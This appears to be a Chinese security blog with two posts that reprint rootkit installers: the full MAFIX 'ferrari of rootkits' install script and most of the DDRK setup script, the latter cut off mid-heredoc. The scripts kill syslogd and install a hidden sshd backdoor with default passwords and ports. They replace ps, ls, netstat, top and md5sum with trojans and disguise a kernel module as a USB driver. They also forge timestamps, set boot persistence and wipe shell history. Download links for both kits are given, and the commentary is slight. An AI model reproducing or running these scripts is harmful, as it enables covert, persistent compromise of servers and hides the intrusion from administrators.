2011-06-28

网络安全

MAFIX - Linux 2.6 rootkit分析

MAFIX - Linux 2.6 rootkit

这后门很贱，服务器中过一次，属于这个后门的改版。那个添加了模块。

下载地址：

https://forum.eviloctal.com/attachment.php?aid=13419

内容：

MAXFIX

---HOW-TO

---mafix

---mafixlibs

---root

下面为root的内容，也就是安装脚本。

#!/bin/bash

######################

# mafix 0.2 #

# fud 2009/07/15 #

######################

BASEDIR=`pwd`

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

BLK=' [1;30m'

MAG=' [1;35m'

CYN=' [1;30m'

RED='^[[1;32m'

DMAG=' [1;37m'

RES=' [0m'

echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"

echo "${CYN} /__/ / / / / ${DMAG} ___ ${CYN} /__/| ${RES}"

echo "${CYN} | |:: / /:: / /:/_ ${DMAG} / / ${CYN} | |:| ${RES}"

echo "${CYN} | |:|: / /:/: / /:/ / ${DMAG} / /:/ ${CYN} | |:| ${RES}"

echo "${CYN} __|__|:|: / /:/~/:: / /:/ /:/ ${DMAG}/__/:: ${CYN} __|__|:| ${RES}"

echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/ ${DMAG}__/:__ ${CYN} /__/::::____${RES}"

echo "${CYN} :~~__/ :/:/__/ :/:/ ${DMAG} :/ ${CYN} ~~~::::/${RES}"

echo "${CYN} : ::/ ::/ ${DMAG} __::/${CYN} |~~|:|~~ ${RES}"

echo "${CYN} : : : ${DMAG} /__/:/ ${CYN} | |:| ${RES}"

echo "${CYN} : : : ${DMAG} __/ ${CYN} | |:| ${RES}"

echo "${CYN} __/ __/ __/ ${DMAG} ${CYN} |__|/ ${RES}"

echo "${DMAG}${RES}"

echo "${DMAG}- the ferrari of rootkits - ${RES}"

sleep 5

echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"

tar zxf mafixlibs

if [ "$(whoami)" != "root" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"

exit

fi

cd $BASEDIR

sleep 1

killall -9 syslogd >/dev/null 2>&1

startime=`date +%S`

echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"

SYSLOGCONF="/etc/syslog.conf"

REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`

if [ ! -z "$REMOTE" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"

echo

for host in $REMOTE; do

echo -n " "

echo $host

done

echo

echo ' ${CYN}coz this box is logging to it${RES}'

echo

else

echo "${CYN}mafix!${DMAG} > ${CYN} no remote logging found...${RES}"

fi

uname=`uname -n`

twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} WARNING: TRIPWIRE FOUND!${RES}"

if [ -f /var/lib/tripwire/$uname.twd ]; then

chattr -isa $twd #去保护，如果有的话，覆盖，chattr +isa 写保护

else

echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire db found...${RES}"

fi

else

echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire was detected..${RES}"

fi

# restoring login

if [ -f /sbin/xlogin ]; then

chattr -isa /sbin/xlogin

chattr -isa /bin/login

mv -f /sbin/xlogin /bin/login

chmod 7455 /bin/login

chattr +isa /bin/login

fi

echo "${CYN}mafix!${DMAG} > ${CYN} installing trojans...${RES}"

if [ -f /etc/sh.conf ]; then

chattr -isa /etc/sh.conf

rm -rf /etc/sh.conf

fi

# checking if we got needed libs and filez

if [ ! -f /lib/libproc.a ]; then

mv bin/lib/libproc.a /lib/ 2>/dev/null

fi

if [ ! -f /lib/libproc.so.2.0.6 ]; then

mv bin/lib/libproc.so.2.0.6 /lib/ 2>/dev/null

fi

echo "${CYN}mafix!${DMAG} > ${CYN} hold on...${RES}"

/sbin/ldconfig >/dev/null 2>&1

if [ ! -f /usr/bin/md5sum ]; then

touch -acmr /bin/ls bin/md5sum

cp bin/md5sum /usr/bin/md5sum

fi

DEFPASS=race

DEFPORT=11111

if test -n "$1" ; then

echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $1${RES}"

cd $BASEDIR/bin

echo -n $1|md5sum > /etc/sh.conf #生成密码文件

else

echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPASS${RES}"

echo -n $DEFPASS|md5sum > /etc/sh.conf

fi

touch -acmr /bin/ls /etc/sh.conf

chown -f root:root /etc/sh.conf

chattr +isa /etc/sh.conf #写保护

if test -n "$2" ; then

echo "${CYN}mafix!${DMAG} > ${CYN} Port:${DMAG} $2${RES}"

echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config

echo "3 $2" >> $BASEDIR/bin/headers/hosts.h

echo "4 $2" >> $BASEDIR/bin/headers/hosts.h

cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null

else

echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPORT${RES}"

echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config

echo "3 $2" >> $BASEDIR/bin/headers/hosts.h

echo "4 $2" >> $BASEDIR/bin/headers/hosts.h

cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $B ASEDIR/bin/.sh/shdcf2

mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null

fi

if [ -f /lib/lidps1.so ]; then

chattr -isa /lib/lidps1.so

rm -rf /lib/lidps1.so

fi

if [ -f /usr/include/hosts.h ]; then

chattr -isa /usr/include/hosts.h

rm -rf /usr/include/hosts.h

fi

if [ -f /usr/include/file.h ]; then

chattr -isa /usr/include/file.h

rm -rf /usr/include/file.h

fi

if [ -f /usr/include/log.h ]; then

chattr -isa /usr/include/log.h

rm -rf /usr/include/log.h

fi

if [ -f /usr/include/proc.h ]; then

chattr -isa /usr/include/proc.h

rm -rf /usr/include/proc.h

fi

cd $BASEDIR

mv $BASEDIR/bin/headers/lidps1.so /lib/lidps1.so 2>/dev/null

touch -acmr /bin/ls /lib/lidps1.so #修改文件时间与/bin/ls 时间相同

touch -acmr /bin/ls $BASEDIR/bin/headers/* #修改时间

mv $BASEDIR/bin/headers/* /usr/include/ 2>/dev/null

# Ok lets start creating dirs

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

if [ -d /lib/libsh.so ]; then

chattr -isa /lib/libsh.so

chattr -isa /lib/libsh.so/*

rm -rf /lib/libsh.so

fi

if [ -d /usr/lib/libsh ]; then

chattr -isa /usr/lib/libsh

chattr -isa /usr/lib/libsh/*

rm -rf /usr/lib/libsh/*

fi

mkdir $SSHDIR 2>/dev/null

touch -acmr /bin/ls $SSHDIR

mkdir $HOMEDIR 2>/dev/null

touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin

mv .sh/* $SSHDIR/ 2>/dev/null

mv .sh/.bashrc $HOMEDIR 2>/dev/null

if [ -f /sbin/ttyload ]; then

chattr -AacdisSu /sbin/ttyload

rm -rf /sbin/ttyload

fi

if [ -f /usr/sbin/ttyload ]; then

chattr -isa /usr/sbin/ttyload

rm -rf /usr/sbin/ttyload

fi

if [ -f /sbin/ttymon ]; then

chattr -isa /sbin/ttymon

rm -rf /sbin/ttymon

fi

mv $SSHDIR/sshd /sbin/ttyload 2>/dev/null

chmod a+xr /sbin/ttyload 2>/dev/null

chmod o-w /sbin/ttyload 2>/dev/null

touch -acmr /bin/ls /sbin/ttyload

chattr +isa /sbin/ttyload

kill -9 `pidof ttyload` >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon 2>/dev/null

chmod a+xr /sbin/ttymon 2>/dev/null

touch -acmr /bin/ls /sbin/ttymon

chattr +isa /sbin/ttymon

kill -9 `pidof ttymon` >/dev/null 2>&1

cp /bin/bash $SSHDIR

# INITTAB SHUFFLING

chattr -isa /etc/inittab

cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1

cat /etc/inittab |grep getty > /tmp/.init2

echo "# Loading standard ttys" >> /tmp/.init1

echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1

cat /tmp/.init2 >> /tmp/.init1

echo "" >> /tmp/.init1

echo "# modem getty." >> /tmp/.init1

echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1

echo "" >> /tmp/.init1

echo "# fax getty (hylafax)" >> /tmp/.init1

echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1

echo "" >> /tmp/.init1

echo "# vbox (voice box) getty" >> /tmp/.init1

echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1

echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1

echo "" >> /tmp/.init1

echo "# end of /etc/inittab" >> /tmp/.init1

echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload

echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload

touch -acmr /bin/ls /usr/sbin/ttyload

chmod +x /usr/sbin/ttyload 2>/dev/null

chattr +isa /usr/sbin/ttyload

/usr/sbin/ttyload >/dev/null 2>&1

touch -amcr /etc/inittab /tmp/.init1

mv -f /tmp/.init1 /etc/inittab 2>/dev/null

rm -rf /tmp/.init2

# MAKING SURE WE GOT IT BACKDORED RIGHT !

if [ ! "`grep ttyload /etc/inittab`" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} inittab broken, sshd wont be loaded upon reboot :(${RES}"

fi

# Say hello to md5sum fixer boys n gurls !

if [ -f /sbin/ifconfig ]; then

/usr/bin/md5sum /sbin/ifconfig >> .shmd5

fi

if [ -f /bin/ps ]; then

/usr/bin/md5sum /bin/ps >> .shmd5

fi

if [ -f /bin/ls ]; then

/usr/bin/md5sum /bin/ls >> .shmd5

fi

if [ -f /bin/netstat ]; then

/usr/bin/md5sum /bin/netstat >> .shmd5

fi

if [ -f /usr/bin/find ]; then

/usr/bin/md5sum /usr/bin/find >> .shmd5

fi

if [ -f /usr/bin/top ]; then

/usr/bin/md5sum /usr/bin/top >> .shmd5

fi

if [ -f /usr/sbin/lsof ]; then

/usr/bin/md5sum /usr/sbin/lsof >> .shmd5

fi

if [ -f /usr/bin/slocate ]; then

/usr/bin/md5sum /usr/bin/slocate >> .shmd5

fi

if [ -f /usr/bin/dir ]; then

/usr/bin/md5sum /usr/bin/dir >> .shmd5

fi

if [ -f /usr/bin/md5sum ]; then

/usr/bin/md5sum /usr/bin/md5sum >> .shmd5

fi

if [ ! -f /dev/srd0 ]; then

./encrypt -e .shmd5 /dev/srd0

touch -acmr /bin/ls /dev/srd0

chattr a+r /dev/srd0

chown -f root:root /dev/srd0

fi

rm -rf .shmd5

# time change bitch

touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1

touch -acmr /bin/ps ps >/dev/null 2>&1

touch -acmr /bin/ls ls >/dev/null 2>&1

touch -acmr /bin/netstat netstat >/dev/null 2>&1

touch -acmr /usr/bin/find find >/dev/null 2>&1

touch -acmr /usr/bin/top top >/dev/null 2>&1

touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1

touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1

touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1

touch -acmr /usr/bin/dir dir >/dev/null 2>&1

touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1

touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1

# Backdoor ps/top/du/ls/netstat/etc..

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup

mkdir $BACKUP 2>/dev/null

# ps ...

if [ -f /usr/bin/ps ]; then

chattr -isa /usr/bin/ps

cp /usr/bin/ps $BACKUP

mv -f ps /usr/bin/ps 2>/dev/null

chattr +isa /usr/bin/ps

fi

if [ -f /bin/ps ]; then

chattr -isa /bin/ps

cp /bin/ps $BACKUP

mv -f ps /bin/ps 2>/dev/null

chattr +isa /bin/ps

fi

# ifconfig ...

chattr -isa /sbin/ifconfig

cp /sbin/ifconfig $BACKUP

mv -f ifconfig /sbin/ifconfig 2>/dev/null

chattr +isa /sbin/ifconfig

# netstat ...

if [ -f /usr/sbin/netstat ]; then

chattr -isa /usr/sbin/netstat

mv -f netstat /usr/sbin/netstat 2>/dev/null

chattr +isa /usr/sbin/netstat

fi

chattr -isa /bin/netstat

cp /bin/netstat $BACKUP

mv -f netstat /bin/netstat 2>/dev/null

chattr +isa /bin/netstat

# top ...

if [ -f /usr/bin/top ]; then

chattr -isa /usr/bin/top

cp /usr/bin/top $BACKUP

mv -f top /usr/bin/top 2>/dev/null

chattr +isa /usr/bin/top

if [ -f /lib/libncurses.so.5 ]; then

ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null

fi

if [ -f /usr/lib/libncurses.so.5 ]; then

ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null

fi

# slocate ...

if [ -f /usr/bin/slocate ]; then

chattr -isa /usr/bin/slocate

cp /usr/bin/slocate $BACKUP

mv -f slocate /usr/bin/slocate 2>/dev/null

chattr +isa /usr/bin/slocate

fi

# ls ...

chattr -isa /bin/ls

cp /bin/ls $BACKUP

mv -f ls /bin/ls 2>/dev/null

chattr +isa /bin/ls

# find ...

if [ -f /usr/bin/find ]; then

chattr -isa /usr/bin/find

cp /usr/bin/find $BACKUP

mv -f find /usr/bin/find 2>/dev/null

chattr +isa /usr/bin/find

fi

# dir ...

if [ -f /usr/bin/dir ]; then

chattr -isa /usr/bin/dir

cp /usr/bin/dir $BACKUP

mv -f dir /usr/bin/dir 2>/dev/null

chattr +isa /usr/bin/dir

fi

# lsof ...

if [ -f /usr/sbin/lsof ]; then

chattr -isa /usr/sbin/lsof

cp /usr/sbin/lsof $BACKUP

mv -f lsof /usr/sbin/lsof 2>/dev/null

chattr +isa /usr/sbin/lsof

fi

# pstree ...

if [ -f /usr/bin/pstree ]; then

chattr -isa /usr/bin/pstree

cp /usr/bin/pstree $BACKUP

mv -f pstree /usr/bin/pstree 2>/dev/null

chattr +isa /usr/bin/pstree

fi

# md5sum ...

chattr -isa /usr/bin/md5sum

cp /usr/bin/md5sum $BACKUP

mv -f md5sum /usr/bin/md5sum 2>/dev/null

chattr +isa /usr/bin/md5sum

echo "${CYN}mafix!${DMAG} > ${CYN} backdoored some daemons (netstat, ps)${RES}"

cd $BASEDIR

mkdir $HOMEDIR/.sniff 2>/dev/null

mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff 2>/dev/null

chmod +x $BASEDIR/bin/sshd 2>/dev/null

mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp 2>/dev/null

mv $BASEDIR/bin/shsb $HOMEDIR/shsb 2>/dev/null

mv $BASEDIR/bin/hide $HOMEDIR/hide 2>/dev/null

touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff

touch -acmr /bin/ls $HOMEDIR/.sniff/shp

touch -acmr /bin/ls $HOMEDIR/shsb

touch -acmr /bin/ls $HOMEDIR/hide

chmod +x $HOMEDIR/.sniff/* 2>/dev/null

chmod +x $HOMEDIR/shsb 2>/dev/null

chmod +x $HOMEDIR/hide 2>/dev/null

./bin/sshd $1 $2 >> /dev/null

echo "${CYN}mafix!${DMAG} > ${CYN} checking for some vuln daemons....${RES}"

ps aux > /tmp/.procs

if [ "`cat /tmp/.procs | grep named`" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} NAMED FOUND! PATCH IT!${RES}"

fi

if [ -f /usr/sbin/wu.ftpd ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} WU-FTPD FOUND! PATCH IT!${RES}"

fi

if [ "`cat /tmp/.procs | grep smbd`" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} SAMBA FOUND! PATCH IT!${RES}"

fi

if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} RPC.STATD FOUND! PATCH IT!${RES}"

fi

rm -rf /tmp/.procs

netstat -natp > /tmp/.stats

if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} MOD_SSL FOUND! PATCH IT!${RES}"

fi

rm -rf /tmp/.stats

# CHECKING FOR HOSTILE ROOTKITS/BACKDORS

mkdir $HOMEDIR/.owned 2>/dev/null

if [ -f /etc/ttyhash ]; then

chattr -AacdisSu /etc/ttyhash

rm -rf /etc/ttyhash

fi

if [ -d /lib/ldd.so ]; then

chattr -isa /lib/ldd.so

chattr -isa /lib/ldd.so/*

mv /lib/ldd.so $HOMEDIR/.owned/tk8

echo "${CYN}mafix!${DMAG} > ${CYN} tk8 found and owned!{RES}"

fi

if [ -d /usr/src/.puta ]; then

chattr -isa /usr/src/.puta

chattr -isa /usr/src/.puta/*

mv /usr/src/.puta $HOMEDIR/.owned/tk7

echo "${CYN}mafix!${DMAG} > ${CYN} tk7 found and owned!{RES}"

fi

if [ -f /usr/sbin/xntpd ]; then

chattr -isa /usr/sbin/xntpd

rm -rf /usr/sbin/xntpd

fi

if [ -f /usr/sbin/nscd ]; then

chattr -isa /usr/sbin/nscd

rm -rf /usr/sbin/nscd

fi

if [ -d /usr/include/bex ]; then

chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz

chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h

chattr -isa /usr/include/bex

chattr -isa /usr/include/bex/*

mv /usr/include/bex/ $HOMEDIR/.owned/bex2

if [ -f /var/log/tcp.log ]; then

chattr -isa /var/log/tcp.log

cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog

fi

chattr -isa /usr/bin/sshd2 >/dev/null 2>&1

rm -rf /usr/bin/sshd2 >/dev/null 2>&1

echo "${CYN}mafix!${DMAG} > ${CYN} bex2 found and owned!{RES}"

fi

if [ -d /dev/tux/ ]; then

chattr -isa /usr/bin/xsf >/dev/null 2>&1

rm -rf /usr/bin/xsf >/dev/null 2>&1

chattr -isa /usr/bin/xchk >/dev/null 2>&1

rm -rf /usr/bin/xchk >/dev/null 2>&1

chattr -isa /dev/tux >/dev/null 2>&1

mv /dev/tux $HOMEDIR/.owned/tuxkit

echo "${CYN}mafix!${DMAG} > ${CYN} tuxkit found and owned!{RES}"

fi

if [ -f /usr/bin/ssh2d ]; then

chattr -isa /usr/bin/ssh2d

rm -rf /usr/bin/ssh2d

chattr -isa /lib/security/.config/

chattr -isa /lib/security/.config/*

rm -rf /lib/security/.config

echo "${CYN}mafix!${DMAG} > ${CYN} optickit found and owned!{RES}"

fi

if [ -f /etc/ld.so.hash ]; then

chattr -isa /etc/ld.so.hash

rm -rf /etc/ld.so.hash

fi

chattr +isa /usr/lib/libsh

chattr +isa /lib/libsh.so

# GREPPING SHITZ FROM rc.sysinit and inetd.conf

if [ -f /etc/rc.d/rc.sysinit ]; then

chattr -isa /etc/rc.d/rc.sysinit

cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/us r/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep

chmod +x /tmp/.grep

touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep

mv -f /tmp/.grep /etc/rc.d/rc.sysinit

rm -rf /tmp/.grep

fi

if [ -f /etc/inetd.conf ]; then

chattr -isa /etc/inetd.conf

cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep

touch -acmr /etc/inted.conf /tmp/.grep

mv -f /tmp/.grep /etc/inetd.conf

rm -rf /tmp/.grep

fi

# KILLING SOME LAMME DAEMONS

killall -9 -q nscd >/dev/null 2>&1

killall -9 -q xntps >/dev/null 2>&1

killall -9 -q mountd >/dev/null 2>&1

killall -9 -q mserv >/dev/null 2>&1

killall -9 -q psybnc >/dev/null 2>&1

killall -9 -q t0rns >/dev/null 2>&1

killall -9 -q linsniffer >/dev/null 2>&1

killall -9 -q sniffer >/dev/null 2>&1

killall -9 -q lpsched >/dev/null 2>&1

killall -9 -q sniff >/dev/null 2>&1

killall -9 -q sn1f >/dev/null 2>&1

killall -9 -q sshd2 >/dev/null 2>&1

killall -9 -q xsf >/dev/null 2>&1

killall -9 -q xchk >/dev/null 2>&1

killall -9 -q ssh2d >/dev/null 2>&1

echo "${CYN}mafix!${DMAG} > ${CYN} sysinfo:${RES}"

MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`

echo "${CYN}mafix!${DMAG} > hostname :${CYN} `hostname -f` ($MYIPADDR)${RES}"

uname -a | awk '{ print $11 }' >/tmp/info_tmp

echo "${CYN}mafix!${DMAG} > arch: ${CYN}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}"

echo "${CYN}mafix!${DMAG} > alternative ip: ${CYN} "`hostname -i`" -+- Might be ["`/sbin/ifconfig | grep eth | wc -l`" ] active adapters.${RES}"

if [ -f /etc/redhat-release ]; then

echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/redhat-release`${RES}"

elif [ -f /etc/slackware-version ]; then

echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/slackware-version`${RES}"

elif [ -f /etc/debian_version ]; then

echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/debian_version`${RES}"

elif [ -f /etc/SuSE-release ]; then

echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/SuSE-release`${RES}"

elif [ -f /etc/issue ]; then

echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/issue`${RES}"

else echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} unknown${RES}"

fi

echo

echo -n "${CYN}mafix!${DMAG} > cleaning up some traces... ${RES}"

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

if [ -f /.bash_history ]; then

chattr -isa /.bash_history >/dev/null 2>&1

rm -rf /.bash_history

fi

if [ -f /bin/.bash_history ]; then

chattr -isa /bin/.bash_history

rm -rf /bin/.bash_history

fi

cd $BASEDIR

rm -rf /tmp/.r*

cd ..

rm -rf mafix*

echo -n "${CYN}done!${RES}"

echo

rm -rf /tmp/info_tmp

endtime=`date +%S`

echo

echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"

echo "${CYN} /__/ / / / / ${DMAG} ___ ${CYN} /__/| ${RES}"

echo "${CYN} | |:: / /:: / /:/_ ${DMAG} / / ${CYN} | |:| ${RES}"

echo "${CYN} | |:|: / /:/: / /:/ / ${DMAG} / /:/ ${CYN} | |:| ${RES}"

echo "${CYN} __|__|:|: / /:/~/:: / /:/ /:/ ${DMAG}/__/:: ${CYN} __|__|:| ${RES}"

echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/ ${DMAG}__/:__ ${CYN} /__/::::____${RES}"

echo "${CYN} :~~__/ :/:/__/ :/:/ ${DMAG} :/ ${CYN} ~~~::::/${RES}"

echo "${CYN} : ::/ ::/ ${DMAG} __::/${CYN} |~~|:|~~ ${RES}"

echo "${CYN} : : : ${DMAG} /__/:/ ${CYN} | |:| ${RES}"

echo "${CYN} : : : ${DMAG} __/ ${CYN} | |:| ${RES}"

echo "${CYN} __/ __/ __/ ${DMAG} ${CYN} |__|/ ${RES}"

echo "${DMAG}${RES}"

echo "${DMAG} Password: $1 ${RES}"

echo "${DMAG} Port: $2 ${RES}"

if [ -f /usr/sbin/syslogd ]; then

/usr/sbin/syslogd -m 0

else

/sbin/syslogd -m 0

fi

if [ -f /usr/sbin/inetd ]; then

killall -HUP inetd >/dev/null 2>&1

elif [ -f /usr/sbin/xinetd ]; then

killall -HUP xinetd

fi

2011-06-27

网络安全

Linux下rootkit-ddrk攻击获得root权限以及清除方法[转]

DDRK是一个Linux结合shv和adore-ng优点，内核级别的rootkit。

DDRK中包含的文件：

netstat #替换系统中的netstat，从ssh配置文件中读取端口并隐藏

rk.ko #内核模块，实现文件和进程的隐藏功能

setup #rootkit安装文件

tty #ava工具

bin.tgz

---ttymon

---sshd.tgz

---.sh

---shdcf2 #sshd配置文件

---shhk

---shhk.pub

---shrs

---sshd #sshd主程序

DDRK下载地址：http://www.sectop.com/soft/ddrk.tgz

因此只要把这些文件上传到服务器上并成功运行，就可以获得该服务器的root权限。为所欲为，无所不能。

setup内容如下：

#!/bin/bash

##########define variables##########

DEFPASS=123456 //默认密码

DEFPORT=43958 //默认端口

BASEDIR=`pwd`

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

##########check is root##########

if [ "$(whoami)" != "root" ]; then

echo "BECOME ROOT AND TRY AGAIN"

echo ""

exit

fi

##########extract all tar##########

tar zxf bin.tgz

cd bin

tar zxf sshd.tgz

rm -rf ./sshd.tgz

cd $BASEDIR

rm -rf bin.tgz

cd $BASEDIR

##########kill syslogd##########

killall -9 syslogd >/dev/null 2>&1

sleep 2

##########remove sh.conf##########

if [ -f /etc/sh.conf ]; then

rm -rf /etc/sh.conf //经过md5sum加密过的密码文件

fi

##########initialize sshd configuration##########

if test -n "$1" ; then

echo "Using Password : $1"

cd $BASEDIR/bin

echo -n $1|md5sum > /etc/sh.conf

else

echo "No Password Specified, using default - $DEFPASS"

echo -n $DEFPASS|md5sum > /etc/sh.conf

fi

touch -acmr /bin/ls /etc/sh.conf

chown -f root:root /etc/sh.conf

if test -n "$2" ; then

echo "Using ssh-port : $2"

echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config

cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf

else

echo "No ssh-port Specified, using default - $DEFPORT"

echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config

cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf

fi

###########creating dirs##########

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

if [ -d /lib/libsh.so ]; then

rm -rf /lib/libsh.so

fi

if [ -d /usr/lib/libsh ]; then

rm -rf /usr/lib/libsh/*

fi

mkdir $SSHDIR

touch -acmr /bin/ls $SSHDIR

mkdir $HOMEDIR

touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin

mv .sh/* $SSHDIR/

mv .sh/.bashrc $HOMEDIR

if [ -f /sbin/ttyload ]; then

chattr -AacdisSu /sbin/ttyload

rm -rf /sbin/ttyload

fi

if [ -f /usr/sbin/ttyload ]; then

rm -rf /usr/sbin/ttyload

fi

if [ -f /sbin/ttymon ]; then

rm -rf /sbin/ttymon

fi

mv $SSHDIR/sshd /sbin/ttyload

chmod a+xr /sbin/ttyload

chmod o-w /sbin/ttyload

touch -acmr /bin/ls /sbin/ttyload

kill -9 `pidof ttyload` >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon

chmod a+xr /sbin/ttymon

touch -acmr /bin/ls /sbin/ttymon

kill -9 `pidof ttymon` >/dev/null 2>&1

cp /bin/bash $SSHDIR

##########modify inittab##########

cp /etc/inittab /etc/.inittab

sed -e 's@^1:2345@0:2345:once:/usr/sbin/ttyloadn&@' /etc/inittab > /etc/.inittab

touch -acmr /etc/inittab /etc/.inittab

mv -f /etc/.inittab /etc/inittab

echo "/sbin/ttyload -q > /dev/null 2>&1" > /usr/sbin/ttyload

echo "/sbin/ttymon > /dev/null 2>&1" >> /usr/sbin/ttyload

echo "${HOMEDIR}/tty i `pidof ttyload` > /dev/null 2>&1" >> /usr/sbin/ttyload

echo "${HOMEDIR}/tty i `pidof ttymon` > /dev/null 2>&1" >> /usr/sbin/ttyload

touch -acmr /bin/ls /usr/sbin/ttyload

chmod 755 /usr/sbin/ttyload

/usr/sbin/ttyload > /dev/null 2>&1

touch -amcr /bin/ls /etc/inittab

###########make sure inittab has modified##########

if [ ! "`grep ttyload /etc/inittab`" ]; then

echo "# WARNING - SSHD WONT BE RELOADED UPON RESTART "

echo "# inittab shuffling probly fucked-up ! "

fi

##########load rk.ko##########

cd $BASEDIR

modprobe -r ehci-hcd

mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko

modprobe ehci-hcd

mv tty $HOMEDIR

##########replace netstat##########

touch -acmr /bin/netstat netstat

mv -f netstat /bin/netstat

##########hide all files and process##########

$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1

$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1

$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1

$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1

$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1

$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1

$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1

$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1

##########load rk.ko on boot##########

cat > /etc/sysconfig/modules/ehci.modules << EOF

